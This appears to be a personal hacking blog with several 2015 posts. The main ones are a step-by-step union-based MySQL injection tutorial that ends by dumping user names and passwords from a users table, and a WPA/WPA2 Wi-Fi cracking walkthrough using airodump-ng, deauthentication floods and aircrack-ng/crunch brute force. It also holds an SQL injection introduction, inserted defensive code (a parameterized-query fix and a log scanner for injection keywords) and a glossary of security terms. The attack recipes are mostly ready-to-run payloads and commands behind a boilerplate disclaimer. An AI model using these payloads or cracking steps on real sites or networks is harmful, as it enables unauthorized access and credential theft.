Friday, 25 December 2015

SQL INJECTION --UNION BASED MYSQL INJECTION ---

This blog is for educational purposes only. Please do not use the skills gained from this blog to harm, attack or even test sites/systems to which you do not have permission; it is illegal to do so. If you get caught (and mind you, you would) then don't say that you did not know. You have been specially warned.
Step 1: find a dynamic page

site.com/page.php?x=y

Step 2: append a ' to check whether the website is vulnerable or not

site.com/page.php?xid=76'

Now the website should give you some sign of an error, such as:
an SQL error, a PHP error, a custom error, page not found, a page redirect, a blank page, data missing from the page, etc.

Step 3: Confirm that the website is vulnerable and find the injection type
(string / integer) by appending --+

site.com/page.php?xid=76'--+

If there is no error, the injection type is string; otherwise try removing the '

site.com/page.php?xid=76--+

Now the normal page should open, which means the injection type is integer. If it still doesn't, try another link.

NOTE* if the injection type is string:

site.com/page.php?xid=76' [sql injection here]--+

if the injection type is integer:

site.com/page.php?xid=76 [sql injection here]--+

Step 4: get the number of columns in the current query using ORDER BY (assuming the injection type is string)

site.com/page.php?xid=76' order by 1--+  no error
site.com/page.php?xid=76' order by 2--+  no error
site.com/page.php?xid=76' order by 3--+  no error
.
.
site.com/page.php?xid=76' order by n--+   error

This means the number of columns = n-1.

Step 5: find the visible/vulnerable columns (assuming the number of columns = 4)

site.com/page.php?xid=76' union select 1,2,3,4--+

Now you should see some or all of these numbers (the numbers that are visible are the vulnerable columns and can be used to retrieve more info).

NOTE* if you don't see any numbers, try putting a - sign before the id

site.com/page.php?xid=-76' union select 1,2,3,4--+

If there are still no numbers, try another type of injection.

Step 6: get the name of the database, the version and the MySQL user (assuming columns 2 and 3 are visible)

site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+

Step 7: get the names of the tables (assuming the database name is xyz)

site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+

NOTE* if you only get a single row, use group_concat(table_name) instead of table_name

Step 8: get the names of the columns (assuming the table name is users)

site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and table_name='users'--+

Step 9: get the data (assuming the column names are user_name and user_pass)

site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+

Step 10: evil smile 3:)
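The bug the ten steps above exploit, shown as an added example that is not part of the original post: a lookup that splices xid into the SQL text, beside the same lookup with a bound parameter, run against an in-memory SQLite database standing in for MySQL (an assumption made so the example runs offline; the pages/users tables and their contents are constructed).

```python
"""Vulnerable vs. parameterized lookup for the page.php?xid=... scenario.

Added example, not code from the original post.  SQLite is used as an
offline stand-in for MySQL (assumption: string quoting, `--` comments and the
UNION column-count rule behave the same for this demonstration; MySQL's `--+`
is just a `--` comment followed by a space once the URL is decoded)."""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the table page.php is meant to read, plus a
    users table the application never intends to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages(id INTEGER, xid TEXT, title TEXT, body TEXT);
        INSERT INTO pages VALUES (76, '76', 'Welcome', 'Hello world');
        CREATE TABLE users(user_name TEXT, user_pass TEXT);
        INSERT INTO users VALUES ('alice', 'hash-of-alice'),
                                 ('bob',   'hash-of-bob');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, xid: str) -> list:
    """The bug behind Steps 2-9: xid is spliced into the SQL text, so a quote
    in the input closes the string literal and the rest runs as SQL."""
    sql = f"SELECT id, xid, title, body FROM pages WHERE xid = '{xid}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, xid: str) -> list:
    """The fix: bind xid as a parameter.  The driver passes it as data, so the
    same payload is just a literal value that matches no row."""
    sql = "SELECT id, xid, title, body FROM pages WHERE xid = ?"
    return conn.execute(sql, (xid,)).fetchall()


# Payloads as they appear on the page (Step 3 probe, Step 5 column markers
# with the leading '-', Step 9 data dump), with `--+` already URL-decoded to
# `-- ` and group_concat adapted to SQLite's `||` concatenation.
PROBE = "76'-- "
MARKERS = "-76' union select 1,2,3,4-- "
DUMP = "76' union select 1,group_concat(user_name||'::'||user_pass),3,4 from users-- "


def leaked_credentials(rows: list) -> Optional[str]:
    """Return the injected group_concat column if the UNION row is present."""
    for row in rows:
        if row[0] == 1 and isinstance(row[1], str) and "::" in row[1]:
            return row[1]
    return None


if __name__ == "__main__":
    conn = make_db()
    print("probe, no error => string injection:", vulnerable_lookup(conn, PROBE))
    print("markers:", vulnerable_lookup(conn, MARKERS))
    print("leaked:", leaked_credentials(vulnerable_lookup(conn, DUMP)))
    print("parameterized, same payload:", safe_lookup(conn, DUMP))
```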

     

Thursday, 24 December 2015

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION

This blog is for educational purposes only. Please do not use the skills gained from this blog to harm, attack or even test sites/systems to which you do not have permission; it is illegal to do so. If you get caught (and mind you, you would) then don't say that you did not know. You have been specially warned.

A few commands that are used in UNION BASED SQL Injection ---

1. UNION --
       The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows.

2. group_concat() --
       syntax -- group_concat(<column_name>)
       Concatenates the data from all the rows of a column and puts it in a single row, separated by ','.

3. information_schema --- (it is like an index)
       It is a metadata database that stores data about data: the list of all tables, the list of all columns, which table a column belongs to, which database a table belongs to, the data type of each column, etc.

4. database() ---
       Returns the name of the database presently in use.

5. ORDER BY X --
       syntax -- order by <column no./name>
       Orders the output of the SELECT query in ascending order of the data in the specified column.

6. LIMIT X,Y ---
       Rows are counted from 0: LIMIT X,Y skips the first X rows and returns Y rows, i.e. rows X+1 through X+Y.

7. user() ---
       Returns the MySQL username of the current user.

8. version() ---
       Returns the version of MySQL installed.

TIPS --- (tables inside information_schema)

  • tables --- stores the information about tables.
  • columns --- stores the information about columns.
  • schemata --- stores the information about databases.
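The same keywords (union select, group_concat, information_schema, order by N) are what a defender looks for in web-server logs. As an added example that is not from the original post, a small scanner that URL-decodes the query string of constructed Apache-style access log lines and reports which of the commands listed above each request contains; the IPs, timestamps and paths are constructed.

```python
"""Detect UNION-based probing in web-server access logs.

Added example, not from the original post.  SAMPLE_LOG holds constructed
lines in Apache combined-log format whose request paths mirror this blog's
payloads as a browser would URL-encode them, plus one benign request."""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
198.51.100.7 - - [25/Dec/2015:10:01:02 +0000] "GET /page.php?xid=76 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Dec/2015:10:01:09 +0000] "GET /page.php?xid=76%27%20order%20by%205--+ HTTP/1.1" 500 312
198.51.100.7 - - [25/Dec/2015:10:01:15 +0000] "GET /page.php?xid=-76%27%20union%20select%201,2,3,4--+ HTTP/1.1" 200 4980
198.51.100.7 - - [25/Dec/2015:10:01:31 +0000] "GET /page.php?xid=76%27%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27xyz%27--+ HTTP/1.1" 200 5302
203.0.113.5 - - [25/Dec/2015:10:02:00 +0000] "GET /search.php?q=european+union HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One indicator per command the post lists, matched against the decoded,
# lower-cased, whitespace-collapsed query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "information_schema": re.compile(r"\binformation_schema\."),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "mysql_fingerprint": re.compile(r"\b(?:database|version|user)\(\)"),
    "comment_terminator": re.compile(r"--(?:\s|$)"),
}


def normalize_query(target: str) -> str:
    """Decode the query string the way the database effectively sees it.
    unquote_plus turns %27 into ' and '+' into a space, which is exactly why
    the post's '--+' ends up as a valid MySQL '-- ' comment."""
    query = target.split("?", 1)[1] if "?" in target else ""
    query = unquote_plus(query).lower()
    query = re.sub(r"/\*.*?\*/", " ", query)   # union/**/select -> union select
    return re.sub(r"\s+", " ", query)


def scan_access_log(text: str) -> list:
    """Return one finding per request whose decoded query matches an indicator.
    A benign 'european union' search matches nothing, because the union rule
    requires a following SELECT."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = normalize_query(m["target"])
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(query))
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "path": m["target"].split("?", 1)[0],
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```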
 

Tuesday, 22 December 2015

SQL INJECTION INTRODUCTION


  • SQL Injection is the most common vulnerability on the internet.
  • It is mainly a flaw in the web application, not a database or web server issue.
  • Most programmers are still not aware of this threat.
What is SQL Injection?
  • SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by the back-end database.
  • In other words, SQL injection is a basic technique/attack used either to gain unauthorised access to a database or to retrieve information directly from the database.
SQL Injection Attacks ----
  1. Authentication Bypass --- Using this attack, an attacker logs on to an application without providing a valid username and password and gains administrative privileges.
  2. Information Disclosure --- Using this attack, an attacker obtains sensitive information that is stored in the database.
  3. Compromised Data Integrity --- An attacker uses this attack to deface a webpage, insert malicious content into webpages, or alter the contents of the database.
  4. Compromised Availability of Data --- An attacker uses this attack to delete database information, logs or audit information that is contained in the database.
  5. Remote Code Execution --- It allows an attacker to compromise the host OS.
How Web Applications Work ----

  • The above fig. shows how the initial request is triggered by the user through the browser over the Internet to the web application server.
  • The web application accesses the database servers to perform the requested task, updating and retrieving the information lying within the database.
  • The web application then presents the information to the user through the browser.
Web Security Issues ----

  • Web applications do raise a number of security concerns stemming from improper coding. Serious weaknesses or vulnerabilities allow hackers to gain direct and public access to databases in order to reach sensitive data.
  • Many of these databases contain valuable information (e.g., personal and financial details), making them a frequent target of hackers.
  • Websites and related web applications must be available 24 hours a day, 7 days a week, to provide the required service to customers, employees, suppliers and other stakeholders.
  • Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public. All modern database systems (e.g. Microsoft SQL Server, Oracle and MySQL) may be accessed through specific ports (e.g., port 80 and 443) and anyone can attempt direct connections to the databases, effectively bypassing the security mechanisms used by the operating system. These ports remain open to allow communication with legitimate traffic and therefore constitute a major vulnerability.
  • Web applications often have direct access to back-end data such as customer databases and, hence, control valuable data and are much more difficult to secure. Those that do not have access will have some form of script that allows data capture and transmission. If a hacker becomes aware of weaknesses in such a script, he may easily reroute unwitting traffic to another location and illegitimately hive off personal details.
  • Most web applications are custom-made and, therefore, involve a lesser degree of testing than off-the-shelf software. Consequently, custom applications are more susceptible to attack.
Types of SQL Injection ---
There are mainly TWO types of SQL injection ----
1. Simple SQL Injection
  • Union SQL Injection
  • Error Based SQL Injection

2. Blind SQL Injection

Okk... I will post the information related to the types of SQL injection in my next blog... so GooD ByE frds....



Monday, 30 November 2015

WPA/WPA2 WIFI CRACKING --


This blog is for educational purposes only. Please do not use the skills gained from this blog to harm, attack or even test sites/systems to which you do not have permission; it is illegal to do so. If you get caught (and mind you, you would) then don't say that you did not know. You have been specially warned.
Step 1-
In this tutorial, I am going to hack a wifi that I just set up, named "7 star". Now, in Kali Linux, open a terminal window and type "ifconfig". This will list all the networking interfaces connected to your device.
Here I only need wlan0, which is my wifi card, so I disable the other interfaces by doing:
ifconfig <name of interface> down
Eg. ifconfig eth0 down --- by doing this the eth0 interface will be disabled.

The lo interface doesn't matter, so leave it as it is.

After doing so, type ifconfig again in the terminal to check whether the eth0 interface was disabled.


Step 2-
Now switch on monitor mode by typing in the terminal: airmon-ng start wlan0

"airmon-ng" is a tool for monitoring air traffic. "start" starts the tool and "wlan0" specifies the interface we are using for monitoring.
It will probably show some processes that could cause trouble, so we kill those processes by typing in the terminal--->
Syntax-->
kill <process ID>
Eg-->
Here my process IDs that could cause trouble are 2615, 2637, 3581, 3675 etc. So I type in the terminal:
kill 2615
kill 2637
kill 3581 ... etc.

If you now do "ifconfig", it should show the newly created monitoring interface, i.e. "mon0".

Step 3-
Now type: airodump-ng mon0

It will show all the visible nearby networks. The moment you see your network, press Ctrl+C to stop the dump, and note down the BSSID and channel no. of the victim n/w.
Here, BSSID -- the MAC address of the victim network.
CH (-c) -- channel number of the victim n/w.
airodump-ng -- tool for capturing wifi packets.
(-w) -- write to the given filename.

Now I have identified the victim network; it is shown in the following fig., highlighted in white.

Step 4-
Start capturing all the packets related to the specific network and store the data in a file.
Syntax-->
airodump-ng --bssid <bssid number> -c <channel no> -w <file name> <interface>
Eg-
Here my victim n/w BSSID is 28:C6:8E:D9:17:77 and the channel no. is 5:

airodump-ng --bssid 28:C6:8E:D9:17:77 -c 5 -w handshake mon0

Here "handshake" is the filename, chosen for our convenience.


Step 5-
Don't close that terminal; open a new terminal and disconnect all the existing clients, so that they try to reconnect and we get the WPA handshake in terminal one.
Syntax--
aireplay-ng --deauth 10 -a <bssid number> mon0
Eg--
aireplay-ng --deauth 10 -a 28:C6:8E:D9:17:77 mon0
Now you should see a handshake captured in the top right corner of terminal one. If you don't see it, run the command again.
Note that--
don't do deauth 0, because if you do, the deauth will not stop and nobody will be able to connect to that wifi.
Now, once you have the handshake, you can close terminal one; the handshake is now stored in the file named handshake-01.cap.
Note that--
if you run the airodump-ng command twice with the same file name, the file name will change to filename-02.cap and so on....

Step 6--

If you type the "ls" command you can see many files, but we only need handshake-01.cap.


Step 7--
Now we want to find the key. For that there are 2 ways--

1. Dictionary attack (brute forcing)--
Syntax --
aircrack-ng -w <dictionary path> <file name path>
Eg-- in this case both my dictionary and the capture file are in the home folder, so I just type-->
aircrack-ng -w rockyou.txt handshake-01.cap

Now it will automatically brute-force... but it takes some time....
Way 2 --->
Generate the dictionary using the crunch command.
Syntax --
crunch <minlength> <maxlength> <character set> -o outputfilename.txt
Eg--
crunch 12 12 0123456789 | aircrack-ng -b <bssid number> <filename> -w -
note --
if a symbol is used in the crunch character set, put it in inverted commas (' ').

Now it will automatically scan for the password...

It takes some time and finally you get the password.


&  it works ….:)


Thursday, 17 September 2015

Cyber security terms you really need to know -


 


1. Anti-spyware Software --
       Anti-spyware software is used in detecting, blocking and/or removing spyware attempts.

Spyware is a type of software that seeks to gather your personal information without your permission. It has the capability to take over your computer entirely! The information it collects is then sent to a third party without your consent.
There are 4 main types of spyware:
  • system monitors,
  • Trojans,
  • adware,
  • and tracking cookies.
Spyware is mainly used for tracking a user's movements online and serving annoying and dangerous pop-up ads.

HOW YOU CAN GET INFECTED:

Your system can get infected with spyware if you visit certain websites, by pop-up messages that ask you to download an application or program (told you they’re evil!), through security holes in the browser or in other software, etc.

Usually, spyware is well hidden and it’s also difficult to observe. You might notice a spyware infection when the virus starts using your system’s resources and slows it down in a way that will make you really, really angry.
 
  2. Antivirus Software

Antivirus software, sometimes called an anti-malware program (you can also call it AV if you want to show off), is computer software used to prevent, detect and remove malicious software.

Antivirus protects your computer from a large number of threats, such as ransomware, rootkits, Trojans, spyware, phishing attacks or botnets.

Without getting technical, let’s just say that the way antivirus scans for infections is not really coping with current threats. Cyber criminals are smart. Really, really smart! And their attacks are vicious, so just remember that antivirus is not enough and you need something more to keep you safe.

But that doesn’t mean you don’t need antivirus. YOU DO, trust me! But you need other stuff too and I’ll tell you more about that later on.
 
  3. Cyber-Attack

A cyber-attack is classified as any type of offensive action used by cyber criminals to deploy malicious code in your system with the purpose of stealing, altering, destroying or taking any advantage from this action.

Cyber-attacks can target both people and things. ANYWHERE. ANYTIME.  Individual users, computer networks, information systems, IT infrastructure of all types and sizes – no one is safe! (And I’m not being dramatic about it.)

And smarter cyber criminals launch stronger attacks, which lead to worse consequences.
 
  4. Drive-by download

A drive-by download can refer to 2 things:
  1. A download which you authorized but without understanding the consequences (example: downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
  2. The unintentional download of a virus or malicious software (malware) onto your computer or mobile device.

HOW YOU CAN GET INFECTED:

Drive-by downloads can happen when you visit a website, when reading an email or by clicking on a deceptive pop-up window.

These types of malicious downloads usually take advantage of (or "exploit") a browser, an app, or an operating system that is out of date and has a security flaw that has not been solved or patched.

This is why it's crucial to keep your software constantly updated. (No worries, I'll nag you about this along the way.)
 
  5. Exploit

An exploit is a piece of software, a chunk of data, or a set of commands that takes advantage of a bug, glitch or vulnerability for malicious purposes.

Exploits can cause disruptions in the behavior of computer software, hardware, or something electronic (usually computerized).

HOW YOU CAN GET INFECTED:

By using exploits, cyber criminals can gain control of your computer.

After that, they can do pretty much what they want.

One of the ways to protect yourself from exploits is to keep your software updated at all times (told you I’d nag you about this!) and take all essential security measures (which I’ll show you in this course).
 
  6. Keylogging

Keylogging (also called keystroke logging) is a method that cyber criminals use to record (or log) the keys you strike on your keyboard in order to get confidential information about you.

Of course they do this in a concealed manner, so that you won’t know you are being monitored while typing passwords, addresses and other secret data on your keyboard as usual.

HOW YOU CAN GET INFECTED:

Keyloggers are usually used with malicious intentions, to steal passwords or credit card information.

Although many anti-spyware applications can detect some software based keyloggers and quarantine, disable or cleanse them, there is no solution that can claim to be 100% effective against this type of threat.
 
  7. Malvertising

Malvertising (short for "malicious advertising") is the use of online advertising to spread malware.
Cyber criminals inject malicious or malware-loaded code into online advertising networks or legitimate websites, which then infect your systems through clicking, redirection or drive-by downloads.

Since online ads are managed by online advertising networks, even a legitimate website may host an infected web banner, although the website itself remains uncompromised. Some of the websites that have unknowingly hosted malvertising are The New York Times, the London Stock Exchange, Spotify, and The Onion.

HOW YOU CAN GET INFECTED:

Cyber criminals use pop-up ads, drive-by downloads, web widgets, hidden iframes, malicious banners, and third-party applications (example: forums, help desks, customer relationship management systems, etc.) to deliver malware. This is why malvertising is so wide-spread, affecting many users without their knowledge.
 
  8. Malware

Malware (short for malicious software) is one of the terms you'll hear most often when it comes to cyber security threats. The term defines any software used by cyber criminals to:
  • disrupt computer operations,
  • gather sensitive information,
  • or unlawfully gain access to private computer systems.

Malware is characterized by its malicious intent, because it acts stealthily to steal your information or to spy on your computer for a long time, without your knowledge.

'Malware' is a general term used to refer to an entire category of malicious or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other harmful programs.

HOW YOU CAN GET INFECTED:

Malware is usually spread through executable code, scripts, active content, and other software. The major threat it poses comes from malware being disguised as, or embedded in, non-malicious files, such as .jpeg, .mpeg, .exe, .gif, .mp3 and many, many more.

You should definitely check out this list of 50+ File Extensions That Are Potentially Dangerous on Windows to get an even better idea of how malware can sneak into your system.
 
  9. Patching

Patching is the process of updating software to a different, newer version. A patch is a small update released by a software manufacturer to fix bugs in existing programs.

A patch can relate to features and usability, but it can also include security features.

Patching is essential for your online security, because it prevents cyber criminals from launching attacks using Zero Day viruses (definition at #18).
 
  10. Phishing

Phishing is (yet) another method that cyber criminals use in order to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by posing as a trustworthy entity in emails or other means of electronic communication.

Phishing is an example of social engineering techniques (definition at #12) used to deceive users, and exploits the poor usability aspects of current web security technologies.

HOW YOU CAN GET INFECTED:

A phishing email could seem to come legitimately from your bank, and could trick you into entering valid credentials on a fake website.

Phishing is done through emails, instant messaging apps or social media posts (on Facebook, Twitter, LinkedIn, etc.).
 
  11. Ransomware

Ransomware is a form of malware that essentially holds a computer system captive while demanding a ransom.

This type of malware locks you out of your computer by either:
  • encrypting files on the hard drive,
  • or locking down the system and displaying messages that extort you into paying the malware creator to remove the restrictions and regain access to your computer, usually via a key. The bad news is that the malware creator is the only one who knows the key.

HOW YOU CAN GET INFECTED:

Ransomware typically spreads like a normal computer worm (by replicating itself, i.e. making an exact copy of itself, in order to spread to other computers), and it could infect your system via a downloaded file or through some other vulnerability in a network service.

The chances of retrieving your data are very small, unless you’re willing to pay the ransom (which is why it’s crucial to have a back-up of your data in a secure location).

The malware creator will either supply a program which can decrypt the files, or he will send an unlock code that decrypts your data. But there is no guarantee that this will happen, even if you pay the requested ransom.
 
  12. Social engineering

Social engineering is one of the most commonly used methods of cyber hacking, and it requires little to no technology. It relies on psychological manipulation to trick victims into performing certain actions or divulging (private or sensitive) confidential information.

HOW YOU CAN BE COMPROMISED:

In this case, cyber criminals use lies, impersonation, tricks, bribes, blackmail, and threats (just like your ex) to attack information systems. Phishing (defined at #10) is also a form of social engineering.

For example, cyber criminals may pose as contractors, exterminators, fire marshals and technicians to go unnoticed as they steal your secrets or trick you into divulging (private or sensitive) confidential information about your company.
 
  13. Spam

We all know that spam is made of those pesky (annoying), unsolicited emails that clog our inboxes. But in recent years spam has spread to instant messaging apps, texting, blogs, forums, search engines, file sharing and social media.

HOW YOU CAN GET INFECTED:

While spam itself may not seem very dangerous, it sometimes carries malware, spreads viruses, worms and other types of threats, such as financial theft, identity theft, data and intellectual property theft, fraud, and deceptive marketing.
 
  14. Trojan (Trojan horse)

A Trojan horse (commonly known as a Trojan) is a type of malware that disguises itself as a normal file or program to trick you into downloading and installing malware.

A Trojan can do many dangerous things to your system, like give cyber criminals unauthorized, remote access to your infected computer.

Once that happens, cyber criminals can:
  • steal data (logins, financial data, even electronic money),
  • install more malware, modify files,
  • monitor your activity (screen watching, keylogging, etc.),
  • use the computer in botnets (a collection of Internet-connected programs communicating with other similar programs in order to spread malware),
  • encrypt your files, like in the case of ransomware (defined at #11)
  • crash your computer
  • format your disks, destroying all the contents on your device, etc.

HOW YOU CAN GET INFECTED:

There are plenty of ways in which your system can become compromised by a Trojan:
  • through email attachments
  • software or music downloads
  • unsafe instant messages
  • peer 2 peer downloads
  • routine forms that need to be filled in
  • drive-by downloads, etc.
 
  15. URL or web content filtering

URL or web filtering technology is software which keeps you from accessing inappropriate websites or content or that prevents you from ending up in a dangerous web location (and by dangerous I mean malware-laden).

The software's filter checks the origin or content of a web page against a set of rules provided by the company or person who has installed the URL filter. If the web page has been blacklisted or marked as infected, it will deny access to that web location, blocking a potential cyber attack.

 
  16. Virus (Computer Virus)

A computer virus (shortly called virus) is a type of malware (told you it would come up often!) capable of replicating itself and spreading to other computers and data files.

Viruses spread to other computers by attaching themselves to various programs and executing code when you launch one of those infected programs.

But they’re really sneaky, so they can also spread through script files, documents, and cross-site scripting vulnerabilities in web apps (defined at #17).

Viruses are also evil, because they can be used to steal information, harm your computers, log keystrokes (keylogging – defined at #6), create botnets, spam your contacts, steal your money, display political or humorous messages on your screen (the least of your worries), and more.


HOW YOU CAN GET INFECTED:

Viruses install themselves without your permission, because cyber criminals use social engineering (defined at #12) and exploit software bugs and vulnerabilities (defined at #17) to gain access to your computing resources.

Viruses can reside in executable files (.exe or .com files), in data files (Microsoft Word documents or PDFs), or in the boot sector of your hard drive. Or in a combination of all of these.
And the worst part is that some viruses are polymorphic, which means that the virus has no parts which remain identical between infections, making it very difficult to detect directly with an antivirus solution.
 
  17. Vulnerability

A cyber security vulnerability is a weakness which allows an attacker to undermine your system's data security defenses.

A vulnerability appears at the intersection of 3 elements:
  1. a system susceptibility or flaw (example: your Java software hasn’t been updated to the latest version – seems pretty innocent, right?)
  2. attacker access to the flaw (example: you click on a malware-infected banner ad which delivers a download on your computer)
  3. and attacker capability to exploit the flaw (example:  now the cyber criminal has a way in, through that malicious download).

A vulnerability is just a pretext (an attempt to make something that is not the case appear true) that a cyber criminal can use to launch a full-scale attack on your system. He still needs the right tools for that, but they come in large supply online and they're cheap as well.

The way to protect yourself against vulnerabilities is to maintain your software updated at all times.
 
  18. Zero-Day virus

Now that you know what a vulnerability is, it’ll be really easy to understand what a Zero-Day virus is as well.

Zero-Day viruses appear when cyber criminals discover a flaw in a piece of software (for example, in Adobe Air). They exploit that vulnerability, launching an attack that users can’t defend themselves against, for two simple reasons:
  • The flaw they exploit is attacked by launching a previously unknown computer virus or other malware
  • Antivirus programs rely upon signatures to identify malware, but the signature for this new breed of malware or virus is not in their database, because it’s new and hasn’t been sampled.

That is why antivirus software is not effective against Zero-Day viruses, and that's why you need additional solutions to protect you from advanced attacks such as these.

HOW YOU CAN GET INFECTED:

The usual methods described beforehand work in this case as well:
  • drive-by downloads
  • malvertising
  • spam
  • through email attachments
  • software or music downloads
  • unsafe instant messages
  • peer 2 peer downloads
  • routine forms that need to be filled in, etc.

The difference is that, once you get infected, there’s very little you’ll be able to do to stop the infection and mitigate its effects.